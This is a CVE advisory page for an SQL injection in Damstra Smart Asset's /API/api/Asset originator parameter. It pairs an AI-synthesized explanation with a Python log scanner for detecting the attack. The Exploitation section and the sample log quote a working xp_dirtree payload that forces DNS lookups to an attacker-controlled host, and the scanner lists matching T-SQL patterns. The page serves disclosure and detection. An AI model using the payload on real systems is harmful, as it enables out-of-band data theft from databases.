CVE-2020-26525
Description
Damstra Smart Asset 2020.7 has SQL injection via the API/api/Asset originator parameter. This allows forcing the database and server to initiate remote connections to third party DNS servers.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Damstra Smart Asset 2020.7 is vulnerable to SQL injection via the originator parameter, allowing attackers to force the database to perform DNS lookups to exfiltrate data.
Vulnerability
Damstra Smart Asset version 2020.7 contains a SQL injection vulnerability in the API/api/Asset endpoint's originator parameter. The input is not sanitized, allowing an attacker to inject arbitrary SQL commands. This is demonstrated in [2] by injecting a payload that uses xp_dirtree to force a DNS lookup to an attacker-controlled server.
Exploitation
An attacker can send a crafted HTTP GET request to /API/api/Asset with a malicious originator parameter containing a SQL injection payload. The payload in [2] uses declare @q varchar(99); set @q='\\\\\\qoe'; exec master.dbo.xp_dirtree @q;-- to initiate a DNS lookup. An Authorization header with a valid bearer token is required by the endpoint, but the SQL injection is still triggered even if authentication fails, because the 401 response is returned after the injected SQL has run. The remote listener receives the DNS lookup from the target.
Impact
Successful exploitation allows an attacker to force the MSSQL database to initiate outbound connections to arbitrary DNS servers. This can be used to exfiltrate data via DNS, or to perform secondary attacks. The injection runs within the database context; the attacker does not retrieve data directly from the HTTP response but extracts information through a DNS side channel.
Mitigation
According to the available references, no official patch has been released. The vendor's website [1] provides product information but no security advisory. Users should apply input validation and parameterized queries to prevent SQL injection. If possible, restrict outbound traffic from the database server. The CVE publication date is 2020-10-02, and no fix is listed.
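A log check for the request pattern described under Exploitation, added here as an example and not code from the CVE references or the vendor: it URL-decodes the originator parameter of /API/api/Asset requests and flags T-SQL constructs, keeping 401 responses in scope because the injection runs before the rejection. The three-field log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (method, URL, status); not taken from a real server.
SAMPLE_LOG = """\
GET /API/api/Asset?originator=web&page=1 200
GET /API/api/Asset?originator=1%27%3Bdeclare%20%40q%20varchar(99)%3Bexec%20master.dbo.xp_dirtree%20%40q%3B-- 401
GET /API/api/Asset?originator=O%27Brien 200
GET /api/health 200
"""

# T-SQL constructs that have no place in an originator value.
SUSPICIOUS = [
    ("stacked_statement", re.compile(r";\s*(declare|exec|execute|set|select)\b", re.I)),
    ("xp_procedure", re.compile(r"\bxp_\w+", re.I)),
    ("sql_comment", re.compile(r"--|/\*")),
    ("unc_path", re.compile(r"\\\\")),
]

def check_line(line):
    """Return a finding dict for a suspicious Asset request, else None."""
    parts = line.split()
    if len(parts) != 3:
        return None
    method, url, status = parts
    split = urlsplit(url)
    # Assumption: the server treats the path case-insensitively.
    if split.path.lower() != "/api/api/asset":
        return None
    # parse_qs percent-decodes values, so encoded payloads are matched too.
    values = parse_qs(split.query, keep_blank_values=True).get("originator", [])
    hits = sorted({name for v in values for name, rx in SUSPICIOUS if rx.search(v)})
    if not hits:
        return None
    # Per the write-up, the 401 is sent after the injected SQL has run,
    # so a rejected request is still treated as a possible execution.
    return {"status": int(status), "indicators": hits, "rejected_by_auth": status == "401"}

def scan(log_text):
    """Check every line of a log and return the list of findings."""
    return [f for f in map(check_line, log_text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with rejected_by_auth set should be correlated with outbound DNS or SMB attempts from the database host at the same time.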
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Damstra/Smart Asset
- Range: =2020.7
Patches
No patches discovered yet.
References
- github.com/lukaszstu/SmartAsset-SQLinj-CVE-2020-26525/blob/main/README.md (mitre, x_refsource_MISC)
- support.damstratechnology.com/hc/en-us/categories/900000115446-SmartAsset-Damstra-Asset-Management-Platform (mitre, x_refsource_MISC)
- www.smartasset.com.au (mitre, x_refsource_MISC)